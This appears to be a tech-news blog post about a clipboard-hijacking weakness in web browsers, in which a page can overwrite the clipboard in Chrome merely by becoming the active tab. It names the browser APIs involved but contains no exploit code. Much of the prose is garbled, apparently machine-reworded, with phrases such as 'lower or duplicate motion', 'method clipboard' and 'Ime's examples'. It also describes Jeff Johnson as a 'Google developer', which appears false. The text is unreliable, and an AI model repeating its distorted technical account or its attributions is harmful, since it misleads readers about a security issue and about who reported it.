The vulnerability may be exploited in a number of ways, all of which give the page access to rewrite the contents of the clipboard, according to Google developer Jeff Johnson. Once permission is given, users may be affected by deliberately initiating a lower or duplicate motion, clicking on backlink on the website, or even by doing very basic movements like scrolling up or down the problematic website page.
Johnson went into further detail about the flaw, noting that Chrome users can be affected by merely briefly browsing a damaging page whereas Firefox and Safari users must actively copy textual material to the clipboard using the keys Control+C or Control-C.
In order to be able to write to the clipboard, the website needs to be in the active tab. Quickly toggling tabs is enough. You don’t have to interact with the website or look at it for more than a tenth of a second. pic.twitter.com/KzsT6UByAq
— Šime “I’m on Mastodon” Vidas (@simevidas) September 2, 2022
Johnson’s blog post makes reference to video samples from Sime, a content producer who specializes in creating information for web developers. Ime’s examples highlight how quickly Chrome users may be manipulated because the vulnerability simply has to be enabled by switching between open browser tabs.
The malicious website instantaneously changes the contents of the clipboard with anything the threat actor chooses to provide, regardless of how long or what kind of discussion the person typically has.
On Johnson’s website, there are intricate details that explain how a website might obtain permission to write to the method clipboard. An individual system makes use of the now-deprecated command document.execCommand.
Another approach makes use of the more recent navigator.clipboard.writetext API, which has the ability to automatically produce any text and copy it to the clipboard without the need for further steps. On Johnson’s website, a working example of similar approaches to the same issue is provided.
To read our blog on “TikTok in-app browser was discovered to be capturing keystrokes,” click here.
